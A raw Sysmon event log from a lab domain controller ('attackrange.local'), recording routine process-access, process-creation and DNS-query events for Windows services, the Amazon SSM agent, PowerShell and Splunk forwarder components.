13:34:24.495{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002443Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.495{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002442Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.495{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E60-6005-7200-00000000A301}2144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002441Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.494{59A5CD1D-8E5B-6005-5500-00000000A301}37483704C:\Program Files\Amazon\SSM\ssm-agent-worker.exe{59A5CD1D-8E60-6005-7200-00000000A301}2144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\ssm-agent-worker.exe+5d9ee 154100x80000000000000002440Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.495{59A5CD1D-8E60-6005-7200-00000000A301}2144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-WinEvent -FilterHashtable @( @{ LogName='System'; ProviderName='Microsoft-Windows-Kernel-General'; Id=12; Level=4 }, @{ LogName='System'; ProviderName='Microsoft-Windows-WER-SystemErrorReporting'; Id=1001; Level=2 } ) | Sort-Object TimeCreated -Descending" "| Select-Object" "Id, Level, ProviderName, TimeCreated, Properties" "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{59A5CD1D-8E5B-6005-5500-00000000A301}3748C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 10341000x80000000000000002439Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.204{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2800-00000000A301}2696C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6668|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002438Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.204{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2800-00000000A301}2696C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002437Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.204{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2800-00000000A301}2696C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002436Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.204{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2800-00000000A301}2696C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002435Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.204{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2800-00000000A301}2696C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6668|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002434Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.204{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2800-00000000A301}2696C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002433Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.204{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2800-00000000A301}2696C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002432Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.204{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2800-00000000A301}2696C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002487Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:25.517{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E61-6005-7300-00000000A301}3472C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002486Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:25.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002485Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:25.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002484Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:25.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002483Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:25.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002482Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:25.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002481Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:25.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002480Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:25.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002479Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:25.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002478Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:25.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002477Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:25.517{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E61-6005-7300-00000000A301}3472C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002476Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:25.517{59A5CD1D-8E56-6005-3000-00000000A301}25323456C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E61-6005-7300-00000000A301}3472C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002475Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:25.335{59A5CD1D-8E61-6005-7300-00000000A301}3472C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe8.0.2Performance monitorsplunk ApplicationSplunk Inc.splunk-perfmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=1F3027C93882E5D5A667B84CCEF3ED67,SHA256=504CDB3742BCBF617C837270CCEC0243205B7BF0A6AB5117EFB838DD2F004AAC,IMPHASH=53D37CD53647C5D82FCFA9E6970E154E{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x80000000000000002474Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.010{59A5CD1D-8E56-6005-2800-00000000A301}2696..localmachine0fe80::16d:d52:d54:cffc;C:\Windows\System32\spoolsv.exe 22542200x80000000000000002473Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.010{59A5CD1D-8E56-6005-2800-00000000A301}2696..localmachine010.0.1.14;C:\Windows\System32\spoolsv.exe 10341000x80000000000000002504Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:26.532{59A5CD1D-8E62-6005-7400-00000000A301}31683480C:\Program 